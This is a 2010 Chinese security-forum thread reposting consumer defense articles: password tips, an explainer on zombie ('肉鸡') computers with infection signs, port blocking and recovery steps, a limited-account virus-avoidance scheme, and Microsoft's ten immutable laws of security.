瑞星卡卡安全论坛
流浪●剑尊 - 2010-3-14 19:40:00
电脑密码安全十条建议
当前,大部分用户密码被盗多是因为缺少网络安全保护意识以及自我保护意识,以致被黑客盗取引起经济损失,今天我将讨论一下针对昨天十类破解方法的对策,也举出十类密码安全和保护措施,可以帮助用户提高网络安全意识。
1、使用复杂的密码
密码穷举对于简单的长度较少的密码非常有效,但是如果网络用户把密码设的较长一些而且没有明显规律特征(如用一些特殊字符和数字字母组合),那么穷举破解工具的破解过程就变得非常困难,破解者往往会对长时间的穷举失去耐性。通常认为,密码长度应该至少大于6位,最好大于8位,密码中最好包含字母数字和符号,不要使用纯数字的密码,不要使用常用英文单词的组合,不要使用自己的姓名做密码,不要使用生日做密码。
2、使用软键盘
对付击键记录,目前有一种比较普遍的方法就是通过软键盘输入。软键盘也叫虚拟键盘,用户在输入密码时,先打开软键盘,然后用鼠标选择相应的字母输入,这样就可以避免木马记录击键,另外,为了更进一步保护密码,用户还可以打乱输入密码的顺序,这样就进一步增加了黑客破解密码的难度。
3、使用动态密码(一次性密码)
动态密码(Dynamic Password)也称一次性密码,它指用户的密码按照时间或使用次数不断动态变化,每个密码只使用一次。动态密码对于截屏破解非常有效,因为即使截屏破解了密码,也仅仅破解了一个密码,下一次登录不会使用这个密码。不过鉴于成本问题,目前大多数动态密码卡都是刮纸片的那种原始的密码卡,而不是真正意义上的一次性动态密码,其安全性还是难以保证。真正的动态密码锁采用一种称之为动态令牌的专用硬件,内置电源、密码生成芯片和显示屏。其中数字键用于输入用户PIN码,显示屏用于显示一次性密码。每次输入正确的PIN码,都可以得到一个当前可用的一次性动态密码。由于每次使用的密码必须由动态令牌来产生,而用户每次使用的密码都不相同,因此黑客很难计算出下一次出现的动态密码。不过真正的动态密码卡成本在100到200元左右,较高的成本限制了其大规模的使用。
4、网络钓鱼的防范
防范钓鱼网站方法的方法是,用户要提高警惕,不登录不熟悉的网站,不要打开陌生人的电子邮件, 安装杀毒软件并及时升级病毒知识库和操作系统补丁。使用安全的邮件系统,Gmail通常会自动将钓鱼邮件归为垃圾邮件,IE7和FireFox也有网页防钓鱼的功能,访问钓鱼网站会有提示信息。
5、使用SSL防范Sniffer
传统的网络服务程序,HTTP、FTP、SMTP、POP3和Telnet等在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,嗅探器非常容易就可以截获这些口令和数据。对于Sniffer(嗅探器),我们可以采用会话加密的方案,把所有传输的数据进行加密,这样Sniffer即使嗅探到了数据,这些加密的数据也是难以解密还原的。目前广泛应用的是SSL(Secure Socket Layer)就可以方便安全的实现加密数据包传输,当用户输入口令时应该使用支持SSL协议的方式进行登录,例如HTTPS、SFTP、SSH而不是 HTTP、FTP、POP、SMTP、TELNET等协议。Google的大多数服务包括Gmail都支持SSL,以防止Sniffer的监听,SSL的安全验证可以在不安全的网络中进行安全的通信。
6、不要保存密码在本地
将密码保存在本地是个不好的习惯,很多应用软件(例如某些FTP等)保存的密码并没有设计的非常安全,如果本地没有一个很好的加密策略,那将让黑客破解密码大开方便之门。
7、使用USB Key
USB Key是一种USB接口的硬件设备。它内置单片机或智能卡芯片,有一定的存储空间,可以存储用户的私钥以及数字证书,利用USB Key内置的公钥算法实现对用户身份的认证。由于用户私钥保存在密码锁中,理论上使用任何方式都无法读取,因此保证了用户认证的安全性。由于USB Key的安全度较高,且成本只有几十元,因此USB Key广泛应用于网上银行的数字证书加密。使用USB Key后,即使黑客完全远程控制了用户的电脑,也无法成功进行登录认证交易。
8、个人密码管理
要保持严格的密码管理观念,实施定期更换密码,可每月或每季更换一次。永远不要将密码写在纸上,不要使用容易被别人猜到的密码。
9、密码分级
对于不同的网络系统使用不同的密码,对于重要的系统使用更为安全的密码。绝对不要所有系统使用同一个密码。对于那些偶尔登录的论坛,可以设置简单的密码;对于重要的信息、电子邮件、网上银行之类,必需设置为复杂的密码。永远也不要把论坛、电子邮箱和银行账户设置成同一个密码。
10、生物特征识别
生物特征识别技术指通过计算机,利用人体所固有的生理特征或行为特征来进行个人身份鉴定。常用的生物特征包括:指纹、掌纹、虹膜、声音、笔迹、脸像等。生物特征识别是一种简单可靠的生物密码技术,生物识别技术认定的是人本身,由于每个人的生物特征具有与其他人不同的惟一性,以及在一定时期内不变的稳定性,不易被伪造和假冒,因此,可以在最大限度地保证个人资料的安全。目前人体特征识别技术市场上占有率最高的是指纹机和手形机,这两种识别方式也是目前技术发展中最成熟的。
流浪●剑尊 - 2010-3-14 19:40:00
电脑“ 肉鸡”大揭秘(一)
一、什么是电脑“ 肉鸡”
所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,Linux,unix等;更可以是一家公司企业学校甚至是政府军队的服务器,一般所说的肉鸡是一台开了3389端口的Win2K系统的服务器,所以3389端口没必要开时关上最好。
要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。
说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。
肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,现在许多人把有WEBSHELL 权限的机器也叫肉鸡。
谁都不希望自己的电脑被他人控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。如何检测自己是否成为肉鸡 注意以下几种基本的情况:
1:QQ、MSN的异常登录提醒 (系统提示上一次的登录IP不符)
2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至用正确的密码无法登录。
3:有时会突然发现你的鼠标不听使唤,在你不动鼠标的时候,鼠标也会移动,并且还会点击有关按钮进行操作。
4:正常上网时,突然感觉很慢,硬盘灯在闪烁,就象你平时在COPY文件。
5:当你准备使用摄像头时,系统提示,该设备正在使用中。
6:在你没有使用网络资源时,你发现网卡灯在不停闪烁。如果你设定为连接后显示状态,你还会发现屏幕右下角的网卡图标在闪。
7:服务列队中出可疑程服务。
8:宽带连接的用户在硬件打开后未连接时收到不正常数据包。(可能有程序后台连接)
9:防火墙失去对一些端口的控制。
10:上网过程中计算机重启。
11:有些程序如杀毒软件防火墙卸载时出现闪屏(卸载界面一闪而过,然后报告完成。)
12:一些用户信任并经常使用的程序(QQ`杀毒)卸载后。目录文仍然存在,删除后自动生成。
13:电脑运行过程中或者开机的时候弹出莫名其妙的对话框
以上现象,基本是主观感觉,并不十分准确,但需要提醒您注意。
接下来,我们可以借助一些软件来观察网络活动情况,以检查系统是否被入侵。
1.注意检查防火墙软件的工作状态
比如金山网镖。在网络状态页,会显示当前正在活动的网络连接,仔细查看相关连接。如果发现自己根本没有使用的软件在连接到远程计算机,就要小心了。
2.推荐使用tcpview,可以非常清晰的查看当前网络的活动状态。
一般的木马连接,是可以通过这个工具查看到结果的。
这里说一般的木马连接,是区别于某些精心构造的rootkit木马采用更高明的隐藏技术,不易被发现的情况。
3.使用金山清理专家进行在线诊断,特别注意全面诊断的进程项
清理专家会对每一项进行安全评估,当遇到未知项时,需要特别小心。
4.清理专家百宝箱的进程管理器
可以查找可疑文件,帮你简单的检查危险程序所在
如何避免自己的电脑成为“肉鸡”
1.关闭高危端口:
第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性 ”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。
第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作(右图):在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。
第五步,进入“新规则属性”对话框,点击“新筛选器操作”,
其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。
重新启动后,电脑中上述网络端口就被关闭了,病毒和黑客再也不能连上这些端口,从而保护了你的电脑。
2.及时打补丁 即升级杀毒软件
肉鸡捕猎者一般都是用“灰鸽子”病毒操控你的电脑,建议用灰鸽子专杀软件杀除病毒。
3.经常检查系统
经常检查自己计算机上的杀毒软件,防火墙的目录,服务,注册表等相关项。
黑客经常利用用户对它们的信任将木马隐藏或植入这些程序。
警惕出现在这些目录里的系统属性的DLL。(可能被用来DLL劫持)
警惕出现在磁盘根的pagefile.sys.(该文件本是虚拟页面交换文件。也可被用来隐藏文件。要检查系统的页面文件的盘符是否和它们对应) 成为肉鸡后的自救方法 一、正在上网的用户,发现异常应首先马上断开连接
如果你发现IE经常询问是你是否运行某些ActiveX控件,或是生成莫名其妙的文件、询问调试脚本什么的,一定要警惕了,你可能已经中招了。典型的上网被入侵有两种情况:
一是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题,这算是轻的;还有就是遇到可以格式化硬盘或是令你的Windows不断打开窗口,直到耗尽资源死机——这种情况恶劣得多,你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。
二是潜在的木马发作,或是蠕虫类病毒发作,让你的机器不断地向外界发送你的隐私,或是利用你的名义和邮件地址发送垃圾,进一步传播病毒;还有就是黑客的手工入侵,窥探你的隐私或是删除破坏你的文件。
自救措施:马上断开连接,这样在自己的损失降低的同时,也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机,进一步的处理措施请参看后文。
二、中毒后,应马上备份、转移文档和邮件等
中毒后运行杀毒软件杀毒是理所当然的了,但为了防止杀毒软件误杀或是删掉你还未处理完的文档和重要的邮件,你应该首先将它们备份到其他储存媒体上。有些长文件名的文件和未处理的邮件要求在Windows下备份,所以上文笔者建议你先不要退出Windows,因为病毒一旦发作,可能就不能进入 Windows了。
不管这些文件是否带毒,你都应该备份,用标签纸标记为“待查”即可。因为有些病毒是专门针对某个杀毒软件设计的,一运行就会破坏其他文件,所以先备份是防患于未然的措施。等你清除完硬盘内的病毒后,再来慢慢分析处理这些额外备份的文件较为妥善。
三、需要在Windows下先运行一下杀CIH的软件(即使是带毒环境)
如果是发现了CIH病毒,要注意不能完全按平时报刊和手册建议的措施,即先关机、冷启动后用系统盘来引导再杀毒,而应在带毒的环境下也运行一次专杀CIH的软件。这样做,杀毒软件可能会报告某些文件受读写保护无法清理,但带毒运行的实际目的不在于完全清除病毒,而是在于把CIH下次开机时候的破坏减到最低,以防它在再次开机时破坏主板的BIOS硬件,导致黑屏,让你下一步的杀毒工作无法进行。
四、需要干净的DOS启动盘和DOS下面的杀毒软件
到现在,就应该按很多杀毒软件的标准手册去按部就班地做。即关机后冷启动,用一张干净的DOS启动盘引导;另外由于中毒后可能Windows已经被破坏了部分关键文件,会频繁地报告非法操作,所以Windows下的杀毒软件可能会无法运行。所以请你也准备一个DOS下面的杀毒软件以防万一。
即使能在Windows下运行杀毒软件,也请用两种以上工具交叉清理。在多数情况下Windows可能要重装,因为病毒会破坏掉一部分文件让系统变慢或出现频繁的非法操作。比如即使杀了CIH,微软的Outlook邮件程序也是反应较慢的。建议不要对某种杀毒软件带偏见,由于开发时候侧重点不同、使用的杀毒引擎不同,各种杀毒软件都是有自己的长处和短处的,交叉使用效果较理想。
五、如果有Ghost和分区表、引导区的备份,用之来恢复一次最保险
如果你在平时用Ghost备份做了Windows的,用之来镜像一次,得到的操作系统是最保险的。这样连潜在的未杀光的木马程序也顺便清理了。当然,这要求你的Ghost备份是绝对可靠的。要是作Ghost的时候把木马也“备份”了就后患无穷了。
六、再次恢复系统后,更改你的网络相关密码
包括登录网络的用户名、密码,邮箱的密码和QQ的密码等,防止黑客用上次入侵过程中得到的密码进入你的系统。另外因为很多蠕虫病毒发作会向外随机发送你的信息,所以及时地更改是必要的。
电脑肉鸡的商业价值
1.盗窃“肉鸡”电脑的虚拟财产
虚拟财产有:网络游戏ID帐号装备、QQ号里的Q币、联众的虚拟荣誉值等等。虚拟财产,是可以兑现为真实货币的,多少不限,积累起来就是财富。
2.盗窃“肉鸡”电脑里的真实财产
真实财产包括:网上银行,大众版可以进行小额支付,一旦你的网银帐号被盗,最多见的就是要为别人的消费买单了。此外,还有网上炒股,证券大盗之类的木马不少,攻击者可以轻易获得网上炒股的帐号,和银行交易不同的是,攻击者不能利用偷来的炒股帐号直接获益,这是由股票交易的特殊性决定的。不然,网上炒股一定会成为股民的噩梦。
相当多的普通电脑用户不敢使用网上银行,原因就是不了解该怎样保护网上银行的帐号安全。事实上,网上银行的安全性比网上炒股强很多。正确使用网上银行,安全性和便利性都是有保障的。
3.盗窃他人的隐私数据
陈冠希事件,相信大家都知道,如果普通人的隐密照片、文档被发布在互联网上,后果将会十分严重。利用偷来的受害人隐私信息进行诈骗、勒索的案例不少。
还有攻击者热衷于远程控制别人的摄像头,满足xxx他人隐私的邪恶目的。
如果偷到受害人电脑上的商业信息,比如财务报表、人事档案,攻击者都可以谋取非法利益。
4.可利用受害人的人脉关系获取非法利益
你或许认为你的QQ号无足轻重,也没QQ秀,也没Q币。实际上并非如此,你的QQ好友,你的Email联系人,手机联系人,都是攻击者的目标,攻击者可以伪装成你的身份进行各种不法活动,每个人的人脉关系都是有商业价值的。
最常见的例子就是12590利用偷来的QQ号群发垃圾消息骗钱,还有MSN病毒,自动给你的联系人发消息骗取非法利益。
5.在肉鸡电脑上种植流氓软件,自动点击广告获利
这种情况下,会影响你的上网体验,相信所有人都很讨厌电脑自动弹出的广告。攻击者在控制大量肉鸡之后,可以通过强行弹出广告,从广告主那里收获广告费,流氓软件泛滥的原因之一,就是很多企业购买流氓软件开发者的广告。
还有的攻击者,通过肉鸡电脑在后台偷偷点击广告获利,当然,受损的就是肉鸡电脑了。
6.以肉鸡电脑为跳板(代理服务器)对其它电脑发起攻击
黑客的任何攻击行为都可能留下痕迹,为了更好的隐藏自己,必然要经过多次代理的跳转,肉鸡电脑充当了中介和替罪羊。攻击者为传播更多的木马,也许会把你的电脑当做木马下载站。网速快,机器性能好的电脑被用作代理服务器的可能性更大。
7.“肉鸡”电脑是发起DDoS攻击的马前卒
DDoS,你可以理解为网络黑帮或网络战争,战争的发起者是可以获取收益的,有人会收购这些网络打手。这些网络黑帮成员,也可以直接对目标主机进行攻击,然后敲诈勒索。“肉鸡”电脑,就是这些网络黑帮手里的一个棋子,DDoS攻击行为已经是网络毒瘤。
总之,“肉鸡”电脑是攻击者致富的源泉,在攻击者的圈子里,”肉鸡“电脑就象白菜一样被卖来卖去。在黑色产业链的高端,这些庞大”肉鸡“电脑群的控制者构筑了一个同样庞大又黑暗的木马帝国。
流浪●剑尊 - 2010-3-14 19:42:00
电脑安全 确保系统无毒的几个小技巧
由于网络和各种存储设备的飞速发展,使得病毒传播的几率也大大的增加了。虽然可以通过安装防病毒软件和网络防火墙来保护你的系统,但是由于病毒技术的发展势头十分迅猛,甚至许多网页中都包含了很多恶意代码,如果用户的防范意识不强的话,即使安装了防病毒软件也很容易“中招”。经过查阅微软资料以及个人的使用经验,我们总结出一套防范病毒的方法,希望能对大家有所帮助。 安插陷阱 布下埋伏
如果大家使用的是Win2000/XP/2003操作系统的话,那么你可以尝试一下以下的方法——从源头上让你的系统可以对病毒免疫。
第一步:首先全新安装的操作系统(或者你能确认你当前使用的系统是无毒的),立即就打开: “开始→程序→管理工具→计算机管理→本地用户和组→用户”,把超级管理员密码更改成十位数以上,并且尽量使用数字和大小写字母相结合的密码。
第二步:建立一个用户,把它的密码也设置成十位以上并且提升为超级管理员。
这样做的目的是为了双保险:如果你忘记了其中一个密码,还有使用另一个超管密码登录来挽回的余地,免得你被拒绝于系统之外;再者就是网上的黑客无法再通过猜测你系统超管密码的方式远程获得你系统的控制权而进行破坏。
第三步:再添加两个用户,比如用户名分别为:nyh1、nyh2;并且指定他们属于user组,好了,准备工作到这里就全部完成了,以后你除了必要的维护计算机外就不要使用超级管理员和nyh2登录了。只使用nyh1登录就可以了。
小提示:建立新用户时,默认为user组。如果要建立管理员用户,在新建完用户后,在“组”里面,点选Administrators组,点击“添加”把这个账号加入Administrators组中。
伪装傀儡 欺骗攻击者
有了陷阱,该怎么用呢?我们继续,登录之后上网的时候找到IE,并为它建立一个快捷方式到桌面上,右键单击快捷方式,选择“以其他用户方式运行”点确定!要上网的时候就点这个快捷方式,它会跟你要用户名和密码这时候你就输入nyh2的用户名和密码!
好了,现在你可以使用这个打开的窗口去上网了,可以随你便去放心的浏览任何恶毒的、恶意的、网站跟网页,而不必再担心中招了!
小提示:不要使用nyh2来登录系统,因为如果那样的话,如果nyh2以前中过什么网页病毒,那么在user2登录的同时,他们极有可能被激活!
下面是建立IE快捷方式的步骤:
在桌面上点击右键,选择“新建→快捷方式”,在弹出的窗口中选择Iexplore(位置在“C:Program FilesInternet ExplorerIexplore.exe”),点击“下一步”完成。然后鼠标右键点击该快捷方式,选择“属性”,再点击“高级按钮”,在以“其他用户身份运行”前打上钩。
以后上网点击IE的时候,会出现如下窗口,输入nyh2和密码即可。不过总有疏忽的时候,万一不小心接收了别人发来的病毒文件,或者从邮件中收到病毒文件,一个不小心中毒了怎么办?不用担心,现在我们就可以来尽情的表演金蝉脱壳的技术了!
重新启动计算机,使用超级管理员登录——进入系统后什么程序都不要运行,你会惊奇的发现在的系统竟然表现的完全无毒!那就再好不过了,现在就立即就打开:“开始→程序→管理工具→计算机管理→本地用户和组→用户”把里面的nyh1和nyh2两个用户全删掉,你只需要这么轻轻的一删就可以了,那么以前随着这两个用户而存在的病毒也就跟随着这两个用户的消失而一起去长眠了。这么做过之后保证你的Windows就像新装的一个样,任何系统文件和系统进程里都完全是没有病毒的!
在再重复开始的步骤从新建立nyh1和nyh2两个用户,让他们复活吧。他们复活是复活了,但是曾跟随了他们的病毒却是没这机会了,因为WinXP重新建立用户的时候会重新分配给他们全新的配置,而这个配置是全新的也是不可能包含病毒的!建立完成之后立即注销超级管理员,转如使用nyh1登录,继续你想做的事吧,你会发现你的系统如同全新了!以上方法可以周而复始的用,再加上经常的去打微软的补丁,几乎可以永远保证你的操作系统是无毒状态!但是,你必须遵循以下两条规则:
保证Windows操作系统无毒的两个技巧:
一、任何时间都不以超级管理员的身份登录系统——除非你要进行系统级更新和维护、需要使用超级管理员身份的时候或是你需要添加和删除用户的时候。
二、必须使用超级管理员登录的时候,保证不使用和运行任何除了操作系统自带的工具和程序之外的任何东西,而且所有维护都只通过开始菜单里的选项来完成,甚至连使用资源管理器去浏览硬盘都不! 只做做用户和系统的管理和维护就立即退出,而决不多做逗留!(这也是微软的要求,微软最了解自己的东东,他的建议是正确的。浏览硬盘的事,在其他用户身份下你有大把的机会,在超级管理员的身份下还是不要了,这应该是能完全作到的)。
总结:
通过以上的方法应该能保证你的系统是安全的了,但是计算机技术的发展速度太快,系统和病毒的运行方式可能随时都会革新,所以以上的方法也不能保证100%的绝对防毒,最好还是安装正版的专业杀毒软件。
流浪●剑尊 - 2010-3-14 19:43:00
网络安全 微软的十大安全性防护守则 (一)
每年微软安全响应中心(Microsoft Security Response Center)调查的安全报告数以千计。在部分案例中,一旦发现其中一份报告指出某个安全性的弱点肇因于某项产品的缺陷,微软就会尽快开发修补程序以修正错误 (请参阅浏览Microsoft Security Response Center)。在其它的案例中,报告的问题不过是在使用产品时人为错误所致。还有很多的案例是介于两者之间,探讨的是真正的安全性问题,但往往并非由产品缺陷所引起。几年以来,微软开发出类似这些问题的清单,称为“十个不变的安全性法则”。
别费神等待防止以下所讨论之问题发生的修补程序上市。Microsoft 或其它软件厂商不可能完全修补这些问题,因为这些问题是因计算机的运作方式而产生。但也别完全绝望,明智的判断力是防止这些问题在您身上发生的关键。如果 您牢记这些法则,便可以显著的改善您系统的安全性。
法则1:如果动机不良的人能够说服您在自己计算机上执行他的程序,那么该计算机便不再属于您。
这是计算机科学不幸的事实:当计算机程序执行时,不管该程序是否有害,它会遵照程序指示作业。当您选择执行一个程序时,这个决定便把计算机的控制权 托付给该程序。一旦程序开始执行,可能会做任何事情,但不会超越您在计算机上所能做的事。程序可以监视您的按键输入并传送到网站、打开计算机上的每一个文 件,并将所有文件中的「会」这个字变更为「不会」、传送粗鲁无礼的电子邮件给您所有的朋友、安装病毒、建立「后门」让他人远程控制您的计算机、拨接到尼泊 尔加德满都的 ISP,或者把您的硬盘重新格式化。
所以这点非常重要:永远不要从不能信任的资源执行甚至下载程序,而「资源」所指的是写程序而不是给您程序的人。执行程序与吃三明治是很好的模拟:如 果有个陌生人走到您面前,给您一块三明治,您会吃吗?恐怕不会吧;如果是您最好的朋友给您三明治呢?您可能会吃,也可能不会吃,得看她是自己做的还是在路 上捡到的。将三明治情境中使用的判断思考应用到程序上,您多半会很安全。
法则2:如果动机不良的人能够在您的计算机上变更操作系统,那么该计算机便不再属于您。
操作系统最终不过是一系列的 0 与 1,被处理器解译时,会引发计算机做特定的事件,而 0 与 1 改变时,会完成不同的事件。0 与 1 储存在哪里呢?就是与其它东西共同存在计算机上!它们只是文件,但如果其它使用计算机的人可以变更这些文件,那就不妙了。
要了解原因,就要把操作系统文件,想象成计算机中最能够信任的文件,且通常是以系统层次的特殊权限执行,也就是说它们可以做任何的事情。此外,可以 信任它们管理使用者账户、处理密码变更,以及执行谁可以做什么的支配规则。如果一个动机不良的人变更这些文件,这些文件就变得无法信任,并且会做此人叫它 们做的事,因此没有什么他办不到的事。他可以窃取密码,让他自己成为计算机的系统管理员,或是新增全新的功能到操作系统。为预防这类型的攻击,请确定系统 文件 (与登录文件) 的保护周全 (在 Microsoft Security 网站上的安全检查清单,会帮助您做到这点)。
法则3:如果动机不良的人能够无限制地实体存取您的计算机,那么该计算机便不再属于您。
如果一个动机不良的人能够使用您的计算机,他可以做的事情不少。这里列出从石器时代到太空时代的取样:
他可以发动技术性极低的拒绝服务攻击,并用大锤砸烂您的计算机。
·他可以把计算机的插座拔掉,把它运到大楼外面,然后以它要挟赎金。
·他可以用磁盘开机,重新格式化您的硬盘。但是等一等,您说:「计算机开机时,计算机上的 BIOS 有设定提示输入密码。」这没什么难的,他大可打开计算机机壳,变更系统硬件,更换 BIOS 的芯片 (其实,还有很多更容易的方式)。
·他可以把您的硬盘从您的计算机移除,然后把它安装到他的计算机并阅读里面的东西。
·他可以复制您的硬盘然后带回他的窝。在那里,他有足够的时间进行暴力攻击,例如尝试所有可能的登入密码。有可用的程序自动化这个工作,假如时间足够,毫无疑问的他会成功。成功后,前述的法则 1 与法则 2 就派上用场了。
·他可以将您的键盘替换成装有无线发报机的键盘,监视您输入的所有讯息,包括您的密码。
要永远确定计算机实体的保护与其价值成正比,并记住计算机的价值不是只有硬件的部分,还包括其中的数据以及动机不良之人得以存取您网络的价值。商业关键性 的机器,至少要放在上锁的机房,只让系统管理员或维修人员存取。但是您可能也要考虑保护其它的计算机,并可能使用额外的保护措施。
如果您带着笔记型计算机旅行,对它的保护绝对很重要。体积小、重量轻等让笔记型计算机成为旅行良伴的特性,也是让它们非常容易遭窃的原因。目前有笔 记型计算机可用的锁与警铃,有的计算机还能让您取下硬盘并随身携带。您也可以使用像是 Windows 2000 加密文件系统的功能,有人成功窃取计算机时可以减轻损害。但是可以让您完全确定文件数据安全与硬件未被变动的唯一方式,就是在旅行时永远将笔记型计算机随身携带。
法则4:如果您允许动机不良的人上载程序到您的网站,那么该网站便不再属于您。
这个法则基本上与法则 1 相反。在法则 1 的状况中,动机不良的人耍花招,让受害者下载有害的程序到他的计算机并执行该程序。在法则 4 的状况中,动机不良的人则上载有害的程序到别人的计算机里,并自行执行该程序。虽然当您随时让陌生人联机到您的计算机时,就会有这样的危险,但是网站涉及 的案例绝大多数都是这一种。许多营运网站的人为了自己的好处而过于好客,让访客上载与执行程序。如同前面所述,如果动机不良的人能够在您计算机上执行程 序,令人不悦的事就会发生。
如果您手上有网站在营运,必须限制访客所能做的事情。在您的网站上,应该只允许自己或可信任之开发者所写的程序。但这些措施可能还不够,如果您的网 站是与其它网站装载于共享的服务器上,您需要特别小心。如果动机不良的人有办法拖累其它网站之一,那他很有可能会扩充他的控制到服务器本身,因而可以控制 所有在上面的网站,包括您的在内。如果您是在共享服务器上,了解该服务器系统管理员的政策是什么就很重要 (顺道一提,在使您的网站公开化前,要确定您已经遵循 IIS 4.0 与 IIS 5.0 的安全检查清单的指示)。
法则5:强大的安全性敌不过脆弱的密码。
登入程序的目的在于建立您的身份。一旦操作系统知道您的身份,就可以适当的授与或拒绝对系统资源的要求。如果动机不良的人取得您的密码,他便可用您 的身份登入。事实上对操作系统而言,这个动机不良的人就是您。您在系统上能做什么他都可以做,因为他就是就是您。或许他要读取您储存在计算机上的敏感信 息,例如您的电子邮件;或许您在网络上比他的权限大,所以借用您的身份便可以做平时不能做的事;或许他只想做坏事然后怪罪到您身上;不管如何,保护您的信 誉是值得的。
永远使用密码。令人惊讶的是,有许多账户竟然使用空白密码。请选择一个复杂的密码,不要使用狗的名字、周年纪念日期或地方球队名称,还有,别用 ”password” 这个字当密码!选一个混合英文字母大小写、数字、标点符号等等的密码,让它愈长愈好,并且常常变更。一旦选取了稳当的密码,要适当加以处理,不要写下来。 如果您一定要把它写下来,至少把它放到安全或可以上锁的抽屉中。一个动机不良的人在找密码时,第一个会找的地方就是在您屏幕旁边的黄色小标签纸。不要告诉 别人您的密码,记得富兰克林曾说:「若要两个人保守秘密,只有其中一人死掉才有可能成立。」
最后,要考虑在系统中使用比密码更强力的东西识别自己。举例来说,Windows 2000 支持智能卡的使用,可以显著加强系统所能执行的识别码检查。您也可以考虑生物测量 (biometric) 的产品,像是指纹与视网模扫描仪。
法则6:计算机的安全性只等同于可靠的系统管理员。
每台计算机须有位系统管理员:这个人能够安装软件、设定操作系统、新增与管理使用者账户、建立安全性政策,与处理所有其它有关保持计算机开机与运作 的管理工作。根据定义,这些工作必须在系统管理员能够控制计算机的情况下运作,如此系统管理员的地位有着无与伦比的力量。一位不可信任的系统管理员能反转 所有您采取的安全措施。他可以变更计算机上的使用权限、变更系统安全性政策、安装有害的软件、新增不存在的使用者,或是做其它各式各样的事情。事实上,他 可以破坏任何操作系统的保护措施,因为他就是控制操作系统的人,最糟的是他还可以掩饰他的行为。如果您有位不可信任的系统管理员,就很明显的没有安全性。
雇用系统管理员时,要认知系统管理员所具有之信任的地位,而且只能雇用能担保那份信任的人。打电话给该系统管理员的推荐人,询问有关他过去的工作纪 录,特别是在过去雇主公司有关安全性的事件。如果您的公司能够接受银行与其它安全意识高的公司所采取的步骤,您可以照样操作,并要求系统管理员通过雇用时 以及雇用后定期的完全背景检查。不管您选用什么标准,都要贯彻实施。在您的网络上,不要给任何人管理上的特殊权限,除非这些人已经过调查,对象包括临时雇 员与承包商。
下一步,采取行动帮助诚实的人保持诚实。使用登入/注销工作表以追踪谁曾出入服务器机房 (您一定有间上锁的服务器机房,对吧?如果没有,请重读法则 3)。在安装或为软件升级时,采用「两人」制度。尽可能把管理工作多元化,如此可以把每个系统管理员所拥有的权力降到最低。还有,不要使用系统管理员账 户,取而代之,给每个系统管理员拥有系统管理员特殊权限的个别的账户,如此您可以知道谁在做什么。最后,考虑进一步让系统管理员更难掩饰他的所作所为。例 如,将稽核数据储存在唯写媒体,或是将系统甲的稽核数据放置于系统乙,并确定两个系统的系统管理员是不同的人。当您的系统管理员愈可靠,您的问题就越少。
法则7:加密数据的安全性只等同于解密金钥。
假设您安装全世界最大、最强固、最安全的锁在您家的前门,但是钥匙就放在门前的垫子底下,那么不管您的锁有多坚固也没有用,不是吗?关键因素在于钥匙没有 好好的保存,因为如果小偷找到它,要开锁可说易如反掌。加密数据的运作方式是一样的-不管加密的算法有多强,数据的安全性只等同于能够解密的金钥。
许多操作系统与加密的软件产品,让您选择把加密金钥储存在计算机里。这个作法的优点是方便-您就不必处理金钥,但是所牺牲的是安全性。这些金钥通常 是隐藏的,有的隐藏方式非常好,但最后不管金钥隐藏的多好,如果它就在计算机里,总是可以找得出来。最后一定会有软件能够找到金钥,因此动机不良之士也可 以找得到。只要有机会,请使用离线的存放区放置金钥。如果机码是一个字或词,请予以牢记;如果不是,就将它汇出到磁盘上、制作备份复本,并把复本储存到不 同且安全的地点。(所有 Syskey 以「本机存放区」模式使用 Syskey 的系统管理员们:您会马上重新设定您的服务器,对吧?)
法则8:过期的扫毒程序比起没有扫毒程序好不了多少。
